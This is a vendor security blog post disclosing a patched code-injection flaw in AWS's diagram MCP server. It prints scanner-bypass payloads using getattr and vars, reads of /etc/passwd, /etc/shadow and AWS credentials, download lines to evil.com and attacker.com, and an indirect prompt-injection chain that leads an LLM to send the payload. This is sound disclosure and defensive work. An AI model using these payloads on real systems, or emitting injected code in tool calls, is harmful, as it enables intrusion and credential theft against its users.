Apr 21, 2026

9 min read

BlueRock Discovers Critical RCE in AWS MCP Server Ecosystem via a CLI Wrapper

BlueRock Security Team

Disclosure: Reported to AWS via HackerOne #3557138 on 2026-02-16. Acknowledged 2026-02-24. Patches applied 2026-02-16 through 2026-03-05. Publicly disclosed 2026-03-09. Server deprecated.

The Model Context Protocol (MCP) is rapidly becoming the connective tissue of AI-powered development. From code generation to infrastructure management, MCP servers let AI agents call tools, execute queries, and interact with cloud services on behalf of developers. AWS alone maintains dozens of open-source MCP servers under the awslabs project — and adoption is accelerating across the industry.

But this convenience comes with a fundamental tension: When MCP servers wrap code-execution primitives like exec(), they inherit the risk of processing untrusted inputs. When an LLM interprets a user request and calls an MCP tool, the code that reaches the server may have been shaped by prompt injection, poisoned context, or a malicious document the user never even read. Every MCP server that accepts and executes code is one bypass away from arbitrary code execution on the host.

We found exactly that. Using the MCP Trust Registry, we were able to identify key implementation patterns in the AWS Diagram MCP Server. After reporting this vulnerability to AWS through HackerOne, we are publicly disclosing the details. This vulnerability affects any deployment of AWS's open-source aws-diagram-mcp-server, an MCP server that generates architecture diagrams from Python code. The server's security scanner can be bypassed in seconds, granting full arbitrary code execution on the host. Patching the scanner is necessary, but what happens in the gap between disclosure and fix? How do you protect MCP servers that execute code by design? Let's break this one down.

Key Takeaways:

AWS’s aws-diagram-mcp-server wraps Python’s exec() behind a pattern-matching scanner — a common “CLI wrapper” pattern across MCP servers and agent skills that creates a systemic class of attack surface
The scanner’s eight-pattern denylist is trivially bypassed using Python reflection (getattr, __dict__, vars) — the attacker needs just one line of code
Exploitation can be fully automated via prompt injection — the developer never sees the malicious payload
BlueRock’s runtime protection blocks the exploit at the execution level, regardless of how the scanner is bypassed
AWS has since patched the server and deprecated it, but the underlying pattern persists across the MCP ecosystem
BlueRock’s MCP Trust Registry can identify MCP server security gaps with code-level evidence to help builders protect against malicious exploits

The MCP Diagram Server `exec()` RCE

AWS maintains a large collection of open-source MCP servers under the awslabs/mcp repository on GitHub. One of these is aws-diagram-mcp-server (package: awslabs.aws-diagram-mcp-server, version 1.0.18 at the time of discovery). Its job is straightforward: accept Python code that uses the diagrams package DSL, execute it, and return a PNG architecture diagram.

The server exposes a tool called generate_diagram. An MCP client — such as Cursor, Windsurf, Cline, Claude Desktop, or any agent framework — sends a code parameter containing Python source. The server scans the code for dangerous patterns, then runs it.
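For orientation, here is a rough sketch of what such a tool call looks like on the wire. MCP uses JSON-RPC 2.0 and invokes tools through the tools/call method. The tool name and the code parameter come from the description above; the request id and the diagram source are illustrative assumptions, and the real tool may accept additional parameters not shown here.

```python
import json

# Hypothetical request id and diagram code. Only the tool name and the
# "code" argument are taken from the article.
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "generate_diagram",
        "arguments": {
            # Whatever string lands here is what the server scans and executes.
            "code": 'with Diagram("Web Service", show=False):\n    EC2("web")',
        },
    },
}

wire_message = json.dumps(request)
print(wire_message)
```

The point of the sketch is that the code argument is just a string. The server has no way to tell whether a developer, an LLM, or an injected prompt wrote it.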

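The execution flow looks like this: the client calls generate_diagram with a code parameter, the server passes that code through validate_syntax(), check_security(), and check_dangerous_functions(), and anything that survives the scan is handed to exec(code, namespace).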

The vulnerability (CWE-94: Improper Control of Generation of Code, or "Code Injection") lies in the final exec() call. The scanner is supposed to reject dangerous code before it reaches exec(). It does not.

Root Cause: Pattern-Matching Denylist on a Privileged Namespace

The vulnerability stems from a mismatch between what the scanner checks and what the runtime provides. The scanner uses string matching to block a short list of dangerous function names. The runtime hands the user code a namespace loaded with the os module, Python's full __builtins__, and urllib's urlretrieve. The scanner never stood a chance.

The Vulnerable Code Path

The server runs three security checks before executing user code.

First, validate_syntax() in scanner.py parses the code into an AST and rejects any import or from...import statements. This check is well-implemented — it uses ast.walk() to find Import and ImportFrom nodes, a semantic check that cannot be fooled by obfuscation.
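A minimal sketch of this kind of AST-based import check follows. It is not the code from scanner.py; the function name has_import and both sample strings are assumptions made for illustration.

```python
import ast


def has_import(code: str) -> bool:
    """Return True if the code contains any import or from...import statement."""
    tree = ast.parse(code)
    return any(
        isinstance(node, (ast.Import, ast.ImportFrom))
        for node in ast.walk(tree)
    )


# An import hidden inside a block and renamed is still an Import node.
nested_import = "if True:\n    import os as harmless"
# A reflective call contains no import statement at all.
reflective_call = "getattr(os, 'system')('id')"

print(has_import(nested_import))    # True
print(has_import(reflective_call))  # False
```

The second result matters for the rest of this analysis: a check that only looks for import nodes is sound for imports, but it says nothing about code that reuses modules already present in the namespace.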

Second, check_security() runs Bandit, a static analysis tool, against the code. Bandit is designed as an advisory linter. It flags some patterns but was never built to serve as a security boundary.

Third — and this is the primary defense — check_dangerous_functions() scans every line of code for eight literal substrings:

dangerous_patterns = [
    'exec(',
    'eval(',
    'subprocess.',
    'os.system',
    'os.popen',
    '__import__',
    'pickle.loads',
    'spawn(',
]

The matching logic is a plain substring check:

for pattern in dangerous_patterns:
    if pattern in line:

If none of these strings appear anywhere in the user's code, the scanner gives the green light. The code then reaches diagrams_tools.py:

exec(code, namespace) # [!] VULNERABILITY

The namespace dictionary passed to exec() is constructed between lines 110 and 253 of diagrams_tools.py. Here is what the server loads into it:

namespace = {}
exec('import os', namespace)               # Full os module
exec('import diagrams', namespace)         # Diagrams package
exec('from diagrams import Diagram, Cluster, Edge', namespace)
exec('from diagrams.aws.compute import *', namespace)     # ...and ~100 more wildcard imports
exec('from urllib.request import urlretrieve', namespace)  # Network download capability

Python also automatically injects __builtins__ into any exec() namespace dictionary. That means the user code has access to getattr, open, eval, exec, compile, type, vars, dir, and __import__ — all of the reflection and execution primitives that Python provides.
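This behavior is easy to confirm in isolation. The short sketch below uses an empty dictionary as the exec() namespace, with no relation to the server's real namespace, and checks that the executed code can still reach the reflection primitives.

```python
# Start from an empty globals dictionary, as a server might.
namespace = {}

# The executed code refers to builtins that were never placed in the namespace.
exec("reachable = [getattr, open, eval, vars, __import__]", namespace)

# exec() inserted the __builtins__ key on its own.
print("__builtins__" in namespace)           # True
print(namespace["reachable"][0] is getattr)  # True
```

Unless the caller supplies its own __builtins__ entry, an empty dictionary is therefore not an empty execution environment.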

The import blocker in validate_syntax() is irrelevant here. The attacker does not need to import anything. The server has already loaded everything dangerous into the namespace.

The "getattr Bomb"

Python's getattr() function retrieves an attribute from an object by name at runtime. It is the reflection equivalent of dot-notation access: getattr(os, 'system') returns the exact same function object as os.system. But the scanner only blocks the literal string "os.system". It has no concept of getattr.

Here is a minimal exploit payload:

getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

This code passes all three scanner checks. validate_syntax() sees no import statements. Bandit flags nothing actionable. check_dangerous_functions() scans for "os.system" and finds only "getattr(os, 'system')", which does not match. The code reaches exec(), which resolves getattr(os, 'system') to the real os.system function, and the shell command runs.
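The denylist miss can be reproduced without running the server. The sketch below reuses the eight patterns and the substring test shown earlier; the function body, its return type, and the two sample strings are assumptions for illustration, not the server's actual implementation. Nothing here executes the payload.

```python
dangerous_patterns = [
    'exec(',
    'eval(',
    'subprocess.',
    'os.system',
    'os.popen',
    '__import__',
    'pickle.loads',
    'spawn(',
]


def check_dangerous_functions(code: str) -> list[str]:
    """Return every denylist pattern found as a literal substring of a line."""
    hits = []
    for line in code.splitlines():
        for pattern in dangerous_patterns:
            if pattern in line:
                hits.append(pattern)
    return hits


direct_call = "os.system('id')"
payload = "getattr(os, 'system')('echo PWNED > /tmp/proof.txt')"

print(check_dangerous_functions(direct_call))  # ['os.system']
print(check_dangerous_functions(payload))      # []
```

The two strings invoke the same function at runtime, but only the first contains the literal text the scanner is looking for.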

The with Diagram(...) block at the end is necessary only because the server checks whether a PNG file was created. Without it, the server returns an error message — but the shell command still executes. The attacker gets RCE regardless of the server's response.

This is not the only bypass. Here are several more, all of which pass the scanner:

getattr(os, 'popen')('whoami').read()                        # No literal "os.popen"
os.__dict__['system']('id')                                  # Dict access, no dot notation
vars(os)['popen']('cat /etc/passwd').read()                  # vars() returns __dict__
open('/etc/passwd').read()                                   # "open" is not in the denylist
open('/tmp/backdoor.sh', 'w').write('curl attacker.com')     # File write, not blocked
urlretrieve('https://evil.com/payload', '/tmp/payload')      # In namespace, not in denylist
fn = 'sys' + 'tem'; getattr(os, fn)('id')                    # Runtime string construction

The denylist contains eight patterns. Python provides dozens of paths to the same dangerous functions. This is why denylists fail against a language as reflective as Python.
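To make the equivalence concrete, the following sketch resolves several of the bypass expressions above and compares each result to os.system by identity. It only looks the function up and never calls it. The dictionary and its labels are illustrative.

```python
import os

# Each value is obtained without writing the literal text "os.system"
# on the right-hand side of the lookup.
candidates = {
    "getattr(os, 'system')": getattr(os, "system"),
    "os.__dict__['system']": os.__dict__["system"],
    "vars(os)['system']": vars(os)["system"],
    "getattr(os, 'sys' + 'tem')": getattr(os, "sys" + "tem"),
}

for expression, resolved in candidates.items():
    same = resolved is os.system
    print(f"{expression:30} same object as os.system: {same}")
```

Every lookup yields the same function object, so a defense keyed on how the name is spelled in source text has nothing stable to match against.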

Dissecting the Attack Chain

Based on our analysis, here is the full attack sequence, mapped to the MITRE ATT&CK framework.

Initial Access (T1566 / Prompt Injection): The attacker influences the code parameter sent to generate_diagram. In a direct-access scenario, the attacker is a connected MCP client. In an indirect scenario — which is more realistic — the attacker uses prompt injection. A malicious document, webpage, or chat message tricks the LLM into generating obfuscated diagram code containing the payload. The LLM calls generate_diagram on the attacker's behalf, and the human operator never sees the raw code.

Develop Capabilities (T1587.001): The attacker crafts a bypass payload. This requires minimal effort: replace os.system('cmd') with getattr(os, 'system')('cmd'). No tooling, no compilation, no binary payloads. Just one line of Python.

Defense Evasion (T1027): The payload avoids all eight denylist patterns through indirection. String concatenation, getattr(), dictionary access, and vars() all resolve to the same dangerous functions at runtime but leave no static trace the scanner can match.

Execution: Command and Scripting Interpreter (T1059.006): The server's own exec() call runs the payload inside the Python process. The code executes with the full privileges of the server — file system access, network access, environment variables, and any IAM role or credentials available to the process.

Post-Exploitation (T1005, T1565.001): With arbitrary code execution achieved, the attacker can:
Read sensitive files: open('/etc/shadow').read(), open(os.path.expanduser('~/.aws/credentials')).read() (open() does not expand ~ on its own, but os.path is already in the namespace)
Exfiltrate environment variables: getattr(os, 'environ') exposes AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, session tokens
Write files: drop SSH keys, cron jobs, or reverse shell scripts
Download payloads: urlretrieve() is already in the namespace
Pivot laterally: use the server's IAM role to access other AWS services

The attack is fully automated once the payload reaches the tool call. There is no user interaction required at the execution stage. The server processes the code, runs the scanner, passes it, and calls exec(). The entire chain completes in under a second.

Business Risks of MCP Code Injection

Failing to address code injection vulnerabilities in MCP servers carries consequences that extend well beyond the compromised process:

Cloud Account Takeover: MCP servers typically run with IAM roles or service account credentials. An attacker who achieves RCE can extract AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY from environment variables, then use those credentials to access S3 buckets, RDS databases, Lambda functions, or any other service the role permits. A single compromised diagram server can become a gateway to your entire cloud environment.

Supply Chain Amplification: In agentic workflows, MCP servers often chain together. A compromised diagram server could poison outputs consumed by downstream agents — corrupting architecture decisions, injecting malicious configurations, or influencing code generation across the pipeline. The blast radius extends far beyond the initial exploit.

Invisible Exploitation via Prompt Injection: The most dangerous variant of this attack requires no direct access to the MCP server. An attacker embeds a prompt injection payload in a document, Slack message, or webpage. When a developer asks their AI assistant to "generate a diagram of this architecture," the LLM dutifully includes the attacker's payload in the tool call. The developer never sees the raw code — they see a diagram and a success message, while the exploit runs silently in the background.

Regulatory and Compliance Exposure: Unauthorized code execution on infrastructure that handles customer data triggers breach notification obligations under GDPR, HIPAA, SOC 2, and similar frameworks. The resulting fines, legal costs, and reputational damage compound quickly.

Lateral Movement: Once inside an MCP server's execution environment, adversaries can probe for network trust, discover adjacent services, and pivot deeper into the infrastructure. An AI tool server is rarely hardened like a production database — it's often the softest target on the network.

Proof of Concept

We verified this vulnerability using the MCP Inspector, a first-party debugging tool from the Model Context Protocol project. Here is the step-by-step reproduction.

Environment setup:

git clone https://github.com/awslabs/mcp.git
cd mcp/src/aws-diagram-mcp-server
git checkout a3a1dd630ce7a01cbe634ebb645774a48ef3d926  # vulnerable commit
uv venv && uv sync --all-groups

Launch the MCP Inspector connected to the server:

npx @modelcontextprotocol/inspector \
  uv --directory $(pwd) run awslabs.aws-diagram-mcp-server

Open http://localhost:6274 in a browser. Click Connect. Navigate to the Tools tab. Click List Tools. Select generate_diagram.

In the code input field, paste the following payload:

getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

Click Run Tool.

The server returns a success response. The diagram was generated. The shell command was also executed.

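Verify in a terminal that /tmp/proof.txt now exists and contains the string PWNED (for example, with cat /tmp/proof.txt).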

The scanner did not flag the payload. The exec() call ran it without restriction. The file was written to disk by a shell command that the server was never supposed to allow.

BlueRock's Runtime Protection: Neutralizing MCP Code Injection

BlueRock's runtime protection mechanisms are designed to stop the behaviors this exploit relies on. The scanner bypass is irrelevant to BlueRock because we do not rely on static pattern matching. We monitor what the process actually does at runtime.

MCP Protection (BR-102)

The MCP ecosystem introduces a new class of attack surface: AI agents calling tools that execute code on the host. Traditional security tools were not designed for this interaction pattern — they don't understand MCP protocol semantics, can't distinguish legitimate tool calls from injected ones, and have no visibility into the intent behind a code parameter.

BlueRock's MCP Protection addresses this gap by operating as an inline security layer alongside MCP deployments. Rather than trusting the application-level scanner (which, as we've demonstrated, can be trivially bypassed), BlueRock monitors the runtime behavior of MCP tool executions. When generate_diagram passes attacker-controlled code to exec(), BlueRock observes the resulting system calls — not the source code patterns. It doesn't matter whether the attacker used getattr, __dict__, vars, or string concatenation to reach os.system. The moment the Python process attempts to fork a shell, BlueRock intercepts and blocks it.

This is particularly critical for MCP servers because they are designed to execute code. You cannot simply block exec() — the server needs it to function. BlueRock draws the line at what the executed code is allowed to do, enforcing behavioral boundaries that distinguish legitimate diagram generation from malicious exploitation.

Python OS Command Injection Prevention (BR-77)

BlueRock's behavioral analysis monitors Python processes for execution patterns indicative of OS command injection. When exec() resolves getattr(os, 'system') and attempts to spawn a shell process, BlueRock intercepts the call at the system boundary. It does not matter how the attacker obtained the function reference — through getattr, __dict__, vars, or any other indirection. The observable behavior is the same: a Python process attempting to fork a shell. BlueRock blocks it before the command executes.
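The difference between matching source text and observing behavior can be illustrated inside Python itself. The sketch below is not how BlueRock works and is not a substitute for enforcement outside the process. It is an in-process analogy, assuming CPython 3.8 or later, that uses the standard sys.addaudithook mechanism to react to the os.system and subprocess.Popen audit events. The names BLOCKED_EVENTS and run_guarded are hypothetical.

```python
import os
import sys

# Audit event names documented by CPython for process-spawning calls.
BLOCKED_EVENTS = {"os.system", "os.exec", "os.posix_spawn", "os.spawn", "subprocess.Popen"}

# Audit hooks cannot be removed once installed, so a flag limits
# enforcement to the window in which untrusted code is running.
_guard_active = False


def _audit_hook(event, args):
    """Raise before the spawn happens, no matter how the function was reached."""
    if _guard_active and event in BLOCKED_EVENTS:
        raise PermissionError(f"blocked runtime event: {event}")


sys.addaudithook(_audit_hook)


def run_guarded(code: str, namespace: dict) -> None:
    """Execute code with the spawn guard switched on for the duration."""
    global _guard_active
    _guard_active = True
    try:
        exec(code, namespace)
    finally:
        _guard_active = False


try:
    run_guarded("getattr(os, 'system')('echo should-not-run')", {"os": os})
except PermissionError as error:
    print(error)  # blocked runtime event: os.system
```

The hook fires on the event, not on the spelling, so getattr, __dict__, and string concatenation all trigger it the same way. Because the hook lives in the same process as the untrusted code, determined code could still tamper with it, which is why the protections described in this section are enforced from outside the process.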

System & Data Integrity Protection (BR-75, BR-91, BR-54)

Even if an attacker finds a way past the initial command injection defense, BlueRock provides additional layers:

Critical Directory Write Protection (BR-75) prevents any unauthorized process from writing to sensitive locations like /home/*/.ssh/, /etc/cron.d/, or application configuration directories. An exploit that attempts to drop an SSH key or a cron job for persistence is stopped at the write call.

Sensitive File Access (BR-91) blocks the RCE from reading files like /etc/shadow, private keys, or cloud credential files. The attacker's attempt to exfiltrate secrets from the filesystem is denied.

Container Drift Protection (BR-54) detects and blocks new binaries or scripts that were not part of the original container image. If the attacker downloads a payload via urlretrieve and attempts to execute it, BR-54 prevents the execution. The container's integrity is preserved.

These protections operate independently of the vulnerability's specifics. BlueRock does not need a signature for this particular exploit. It enforces behavioral boundaries that no code injection — regardless of how it evades the application-level scanner — can cross.

Disclosure Timeline and AWS Response

BlueRock discovered and reported this vulnerability to AWS through HackerOne. Following our report, AWS addressed the issue across multiple commits:

1. Feb 16, 2026 — AST-based scanner rewrite. The string-matching denylist was replaced with proper AST analysis that detects getattr(), vars(), globals(), compile(), dunder access, and other bypass techniques we reported.

2. Feb 26, 2026 — Namespace hardening. The os module and bare __builtins__ were removed from the exec() namespace. The raw urlretrieve was replaced with a safe wrapper that validates URL schemes, file extensions, and prevents path traversal.

3. Mar 5, 2026 — Subprocess isolation. User code execution was moved from in-process exec() to a sandboxed subprocess via _sandbox_runner.py, adding defense-in-depth process isolation. The AST scanner was further expanded to detect frame traversal and code object attributes.
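The three layers described above can be sketched together in a few dozen lines. This is an illustration of the general techniques only: it is not taken from the patched AWS code or from _sandbox_runner.py, and every name in it (BLOCKED_CALLS, find_violations, _RUNNER, run_isolated) is hypothetical. It also omits the diagrams imports a real server would need, and a child process with trimmed builtins is a process boundary, not a complete sandbox.

```python
import ast
import subprocess
import sys

# Layer 1: calls treated as reflective or dangerous in this sketch.
BLOCKED_CALLS = {"getattr", "setattr", "vars", "globals", "locals",
                 "compile", "eval", "exec", "open", "__import__"}


def find_violations(code: str) -> list[str]:
    """Walk the AST and report imports, blocked calls, and dunder access."""
    findings = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append("import statement")
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in BLOCKED_CALLS):
            findings.append(f"call to {node.func.id}()")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append(f"dunder attribute {node.attr}")
    return findings


# Layer 2: the child builds a namespace with a small allowlist of builtins
# and no os module. Layer 3: the code runs in a separate interpreter.
_RUNNER = (
    "import builtins, sys\n"
    "allowed = ('len', 'range', 'print', 'str')\n"
    "safe = {name: getattr(builtins, name) for name in allowed}\n"
    "exec(sys.stdin.read(), {'__builtins__': safe})\n"
)


def run_isolated(code: str, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Reject code that fails the AST scan, then run the rest in a child process."""
    findings = find_violations(code)
    if findings:
        raise ValueError("rejected: " + ", ".join(findings))
    return subprocess.run(
        [sys.executable, "-I", "-c", _RUNNER],  # -I: isolated mode
        input=code, capture_output=True, text=True, timeout=timeout,
    )


print(find_violations("getattr(os, 'system')('id')"))    # ['call to getattr()']
print(run_isolated("print(len('abc'))").stdout.strip())  # 3
```

Each layer covers a gap in the others. A call such as urlretrieve(...) passes this particular AST scan, but fails in the child with a NameError because the name was never placed in the namespace.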

The server has since been deprecated by AWS, with users directed to the diagram agent skill in the deploy-on-aws plugin instead. Notably, none of these security fixes were documented in the project's CHANGELOG.md — organizations running pinned versions of the server may not be aware that security patches exist.

The vulnerable version (commit a3a1dd63, package version 1.0.18) remains exploitable. Any deployment that has not updated to the latest main branch — or that uses the server at all, given its deprecated status — should migrate immediately.

Beyond the Patch: Securing the Behavior, Not Just the Bug

This vulnerability is a textbook case of CWE-94: Code Injection. AWS's response was thorough: they rewrote the scanner to use AST analysis, stripped dangerous modules from the namespace, and moved execution into a sandboxed subprocess. But this addresses one server in one repository.

The deeper problem is architectural. The aws-diagram-mcp-server is a textbook example of a CLI wrapper — an MCP tool that accepts user input and passes it to a code execution primitive. This pattern is everywhere: diagram generators, query runners, data processors, and agent skills all follow the same shape. Each one is a potential exec() away from RCE, and the MCP and agent skill ecosystem will only produce more of them.

Instead of chasing individual vulnerabilities, we secure against the behavior of the exploit itself. BlueRock's runtime protection does not need to know about this specific bug to stop it. It understands that a Python process spawned by an MCP server should not be allowed to fork shells, write to SSH directories, or read credential files. These are fundamental, unauthorized behaviors — and they are the same regardless of whether the attacker used getattr, __dict__, vars, or some technique that has not been invented yet.

By focusing on execution boundaries rather than code patterns, BlueRock provides a durable defense that does not expire with the next bypass technique. It gives your team the space to patch on your schedule, not the attacker's.

Secure Your MCP Infrastructure

Know what's safe before you connect. The MCP Trust Registry scans and evaluates MCP servers across 22+ security rules — covering exposure, authentication, tool risk, data egress, and runtime dependencies — so you can assess risk before integration. Explore the registry or scan your own MCP server.

Enforce runtime guardrails on every agent action. BlueRock Guardrails applies real-time policy enforcement at the point where agents invoke tools and trigger downstream actions — blocking unauthorized behaviors like the exploit demonstrated in this post, with less than 5ms latency overhead. Schedule a demo to see it in action.

FAQ

Is aws-diagram-mcp-server still vulnerable?

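The vulnerability (CWE-94) was disclosed by BlueRock to AWS Security via HackerOne (Report #3557138). AWS patched it in a series of commits between Feb 16 and Mar 5, 2026, and has since deprecated the server. The vulnerable version (commit a3a1dd63, package version 1.0.18) remains exploitable: any MCP client connected to it can achieve full remote code execution on the host by bypassing the denylist scanner with Python reflection primitives like getattr(). Because the fixes were not documented in CHANGELOG.md, deployments pinned to an older version should update to the latest main branch or, given the deprecation, migrate off the server.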

How does the aws-diagram-mcp-server RCE work?

The server accepts Python code, scans it for 8 dangerous string patterns, then executes it via exec(). The scanner fails because the exec() namespace is pre-loaded with the full os module, Python's __builtins__, and urllib's urlretrieve — all before user code runs. Bypassing the scanner requires only one line: getattr(os, 'system')('cmd'), which the scanner doesn't recognize as dangerous but Python's runtime resolves to the real os.system function.

Why do denylist scanners fail against Python's exec()?

Python provides dozens of paths to the same dangerous functions: getattr(), __dict__ access, vars(), and runtime string construction all resolve to identical function objects but produce no string the scanner can match. The denylist contains 8 patterns; Python offers dozens of bypasses. This is a fundamental category error — static string matching cannot cover a language as reflective as Python.

How does BlueRock's runtime protection stop this exploit?

BlueRock does not rely on string pattern matching. BR-102 (MCP Protection) inspects protocol traffic between clients and MCP servers for behavioral anomalies. BR-77 (Python OS Command Injection Prevention) intercepts exec() at the system boundary when it attempts to spawn a shell process — regardless of whether the attacker used getattr, __dict__, vars, or any other indirection. Additional layers BR-75, BR-91, and BR-54 block file writes, credential reads, and container drift even if initial protection is bypassed.

What is the post-exploitation impact of this vulnerability?

With arbitrary code execution achieved, an attacker can read sensitive files (including /etc/shadow and ~/.aws/credentials), exfiltrate AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY from environment variables, write SSH keys or cron jobs for persistence, download payloads via urlretrieve (which is pre-loaded in the exec namespace), and pivot laterally using the server's IAM role.
